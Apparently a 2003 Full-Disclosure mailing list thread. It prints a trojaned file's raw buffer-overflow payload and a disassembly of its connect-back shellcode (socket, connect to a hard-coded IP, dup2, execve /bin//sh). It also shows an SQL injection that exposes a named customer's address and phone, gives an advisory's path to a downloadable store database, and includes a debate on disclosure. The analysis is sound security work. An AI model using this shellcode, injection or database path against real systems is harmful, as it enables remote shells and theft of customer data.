?!??ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉ1?1?1?Q??Q??Q??Qëß???f?Çë?1?1?QQh?b??fh????fQë???SWRëß???f?Ç1?9?t?1????Ç1???ë??Ç1???ë????Ç1???ë????Ç1?1?Phn/shh//bië?PSëß???Ç1????Ç Heh. Boy, did j00 get hax0red! Here's what's actually in that file: $0000 - $00ff: 'A' x 256 $0100 - $011f: DWORD $bffff321 x 8 $0120 - $0378 $90 = NOP x 600 $0378 - $03fa: Binary shellcode $03fb - $03fc: CR, LF <EOF> In other words, it's one very long line. Looks to me like the securecode program reads each line of the .c file into a buffer that's only 256 bytes long; this exploit fills it with 'A', then overwrites the return address on the stack with a pointer into the NOP slide. Here's a disassembly of the shellcode: note that offset 0 in this disassembly is offset $0370 in the file. Sorry for not commenting this, but I don't speak linux asm; however I can see a whole bunch of syscalls going on in there; the values in eax should tell you whether anything nastier than a few mkdirs was done to you... Z:\sploits-misc\targzip>objdump -D --target=binary hello-world2.bin --architectu re=i386 hello-world2.bin: file format binary objdump: hello-world2.bin: no symbols Disassembly of section .data: 00000000 <.data>: 0: 90 nop 1: 90 nop 2: 90 nop 3: 90 nop 4: 90 nop 5: 90 nop 6: 90 nop 7: 90 nop 8: 90 nop 9: 31 c0 xor %eax,%eax b: 31 db xor %ebx,%ebx d: 31 c9 xor %ecx,%ecx f: 51 push %ecx 10: b1 06 mov $0x6,%cl 12: 51 push %ecx 13: b1 01 mov $0x1,%cl 15: 51 push %ecx 16: b1 02 mov $0x2,%cl 18: 51 push %ecx 19: 89 e1 mov %esp,%ecx 1b: b3 01 mov $0x1,%bl 1d: b0 66 mov $0x66,%al 1f: cd 80 int $0x80 21: 89 c2 mov %eax,%edx 23: 31 c0 xor %eax,%eax 25: 31 c9 xor %ecx,%ecx 27: 51 push %ecx 28: 51 push %ecx 29: 68 d4 62 f7 cc push $0xccf762d4 2e: 66 68 b0 ef pushw $0xefb0 32: b1 02 mov $0x2,%cl 34: 66 51 push %cx 36: 89 e7 mov %esp,%edi 38: b3 10 mov $0x10,%bl 3a: 53 push %ebx 3b: 57 push %edi 3c: 52 push %edx 3d: 89 e1 mov %esp,%ecx 3f: b3 03 mov $0x3,%bl 41: b0 66 mov $0x66,%al 43: cd 80 int $0x80 45: 31 c9 xor %ecx,%ecx 47: 39 c1 cmp %eax,%ecx 49: 74 06 je 0x51 4b: 31 c0 xor %eax,%eax 4d: b0 01 mov $0x1,%al 4f: cd 80 int $0x80 51: 31 c0 xor %eax,%eax 53: b0 3f mov $0x3f,%al 55: 89 d3 mov %edx,%ebx 57: cd 80 int $0x80 59: 31 c0 xor %eax,%eax 5b: b0 3f mov $0x3f,%al 5d: 89 d3 mov %edx,%ebx 5f: b1 01 mov $0x1,%cl 61: cd 80 int $0x80 63: 31 c0 xor %eax,%eax 65: b0 3f mov $0x3f,%al 67: 89 d3 mov %edx,%ebx 69: b1 02 mov $0x2,%cl 6b: cd 80 int $0x80 6d: 31 c0 xor %eax,%eax 6f: 31 d2 xor %edx,%edx 71: 50 push %eax 72: 68 6e 2f 73 68 push $0x68732f6e 77: 68 2f 2f 62 69 push $0x69622f2f 7c: 89 e3 mov %esp,%ebx 7e: 50 push %eax 7f: 53 push %ebx 80: 89 e1 mov %esp,%ecx 82: b0 0b mov $0xb,%al 84: cd 80 int $0x80 86: 31 c0 xor %eax,%eax 88: b0 01 mov $0x1,%al 8a: cd 80 int $0x80 8c: 0d .byte 0xd 8d: 0a .byte 0xa DaveK _________________________________________________________________ Sign-up for a FREE BT Broadband connection today! http://www.msn.co.uk/specials/btbroadband --__--__-- Message: 8 Date: Sun, 6 Jul 2003 11:07:22 -0400 (EDT) From: "Larry W. Cashdollar" <lwc () vapid ath cx> To: <full-disclosure () lists netsys com> Subject: Re: [Full-disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely 949 is a legit zip code in cali. On Sat, 5 Jul 2003, KF wrote:Was that legit California data? I am sure than making someone have a nice weekend you just made multiple someones have a shitty month ahead of them... http://www.theregister.co.uk/content/55/31509.html -KF gyrniff wrote:URL: http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239 Change the name Paul to Paul' Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''Paul'',lastName='Smith',customerCompany='Early Impact', address='3226 Colorado Ave', city='Santa Monica', zip='90004', stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'. /productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36 have a nice weekend ;-) On Saturday 05 July 2003 22:07, Tri Huynh wrote:ProductCart database file can be downloaded remotely ================================================= PROGRAM: ProductCart HOMEPAGE: http://www.earlyimpact.com/productcart/ VULNERABLE VERSIONS: 1.0 to 2.0 RISK: High DESCRIPTION ================================================= ProductCart® is an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites. DETAILS ================================================= In the default installation, product cart database file is located at /productcart/database/EIPC.mdb which can be accessed easily by any remote attackers. Sample: http://victimhost/productcart/database/EIPC.mdb The database file includes the store administration password as well as customer's info (including credit card info). WORKAROUND ================================================= Rename the database file, put it in a protected directory. CREDITS ================================================= Discovered by Tri Huynh from Sentry Union DISLAIMER ================================================= The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. FEEDBACK ================================================= Please send suggestions, updates, and comments to: trihuynh () zeeup com_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html--__--__-- Message: 9 From: "Kristian Hermansen" <this_is_kris () hotmail com> To: <full-disclosure () lists netsys com> Subject: Re: [Full-disclosure] Microsoft Cries Wolf ( again ) Date: Tue, 1 Jul 2003 22:49:59 -0400 Yes, programmers should be trained to write better code...but it is more profitiable to allow sloppy code and a simple fix later (behind the scenes with vendor notification). This is MS point-of-view. This is why they want vendor notification, rather than public notification. Again, I say let the 0-days fly. Did you know that certain US government agencies have teams that their only job is to break software? This has been going on since the 1970's. It helps to produce secure code in mission critical applications that the military needs. I am not saying that MS needs to be SO drastic...but a small team for their MOST popular products would sure be wise to start with. Why not hire fucking intern teenagers from russia to "Crash Test" their development projects (facetious)? Would it be so difficult/expensive to hire some of the main companies that are breaking your software??? Kris Hermansen ----- Original Message ----- From: "Schmehl, Paul L" <pauls () utdallas edu> To: <full-disclosure () lists netsys com> Sent: Tuesday, July 01, 2003 6:58 PM Subject: RE: [Full-disclosure] Microsoft Cries Wolf ( again )-----Original Message----- From: Kristian Hermansen [mailto:this_is_kris () hotmail com] Sent: Tuesday, July 01, 2003 3:09 PM To: full-disclosure () lists netsys com Subject: Re: [Full-disclosure] Microsoft Cries Wolf ( again ) I agree. It is not our problem. The reason is this. Microsoft would like to reduce costs. Fixing bugs in products costs money, and 0-day bugs need immediate fixes which slow down MS total output ability. They would like to see everyone reporting to the vendor first because this saves them money!!! In this respect, this also allows them to go on writing sloppy code in order to save a few bucks on every product, thus reducing their overhead. I don't want sloppy code. Let the 0-days fly....maybe MS will start doing extensive testing to their products before they release it for sale to millions of customers. I thought .NET was supposed to fix all this ;-PThat's too funny. Microsoft ran a "buffer overflow finder" against the codebase for XP, and the VP in charge announced publicly that they had "eliminated buffer overflows in XP". Within thirty days, eEye announced the UPnP vulnerability in SSDP, which is the single most devastating hole ever found in MS products. (You can compromise an entire network of XP machines with one attack, simultaneously.) You don't fix code by extensive testing. You fix it by teaching how to write secure code to begin with *and* by ongoing, consistent audits done before code is released. (OpenBSD has been doing this for years, and look at the results.) Paul Schmehl (pauls () utdallas edu) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html--__--__-- _______________________________________________ Full-Disclosure mailing list Full-Disclosure () lists netsys com http://lists.netsys.com/mailman/listinfo/full-disclosure End of Full-Disclosure Digest-- Markus Nielsen <intercool () sexmagnet com> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #933 - 11 msgs Markus Nielsen (Jul 06)
- Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #933 - 11 msgs security snot (Jul 06)
- digest annoyances petard (Jul 06)
- Message not available
- Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #933 - 11 msgs security snot (Jul 06)
- Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #933 - 11 msgs security snot (Jul 06)